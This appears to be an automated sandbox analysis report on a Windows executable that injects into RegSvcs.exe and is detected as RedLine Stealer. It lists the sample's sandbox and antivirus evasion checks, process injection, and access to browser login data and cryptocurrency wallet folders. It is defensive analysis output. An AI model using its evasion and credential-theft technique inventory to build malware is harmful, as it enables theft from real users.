Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 7474
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 7474
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49734

Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_00744A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00744A35
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007C55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_007C55FD

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007633C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_007633C7

Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

API/Special instruction interceptor: Address: 2393244

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2200			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 6399			Jump to behavior

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-98614

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

API coverage: 4.8 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007A4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_007A4696
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007AC93C FindFirstFileW,FindClose,	0_2_007AC93C
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007AC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_007AC9C7
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007AF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007AF200
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007AF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007AF35D
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007AF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_007AF65E
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007A3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007A3A2B
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007A3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007A3D4E
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007ABF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_007ABF27

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_00744AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00744AFE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: RegSvcs.exe, 00000001.00000002.1832520493.0000000000D26000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNL

Source: C:\Users\user\Desktop\b3u71vBG0u.exe	API call chain: ExitProcess graph end node			graph_0-97369
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	API call chain: ExitProcess graph end node			graph_0-97441

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007B41FD BlockInput,

0_2_007B41FD

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_00743B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00743B4C

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_00775CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00775CCC

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007BC304 LoadLibraryA,GetProcAddress,

0_2_007BC304

Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_023934B0 mov eax, dword ptr fs:[00000030h]	0_2_023934B0
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_02393510 mov eax, dword ptr fs:[00000030h]	0_2_02393510
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_02391E70 mov eax, dword ptr fs:[00000030h]	0_2_02391E70

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007981F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_007981F7

Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0076A364 SetUnhandledExceptionFilter,		0_2_0076A364
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_0076A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0076A395

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AFC008

Jump to behavior

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_00798C93 LogonUserW,

0_2_00798C93

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_00743B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00743B4C

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_00744A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00744A35

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007A4EF5 mouse_event,

0_2_007A4EF5

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\b3u71vBG0u.exe"

Jump to behavior

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

0_2_007981F7

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007A4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_007A4C03

Source: b3u71vBG0u.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: b3u71vBG0u.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_0076886B cpuid

0_2_0076886B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007750D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_007750D7

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_00782230 GetUserNameW,

0_2_00782230

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_0077418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_0077418A

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_00744AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00744AFE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegSvcs.exe, 00000001.00000002.1832520493.0000000000CCC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1838545477.00000000061B6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.b3u71vBG0u.exe.23a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: b3u71vBG0u.exe PID: 6292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1928, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
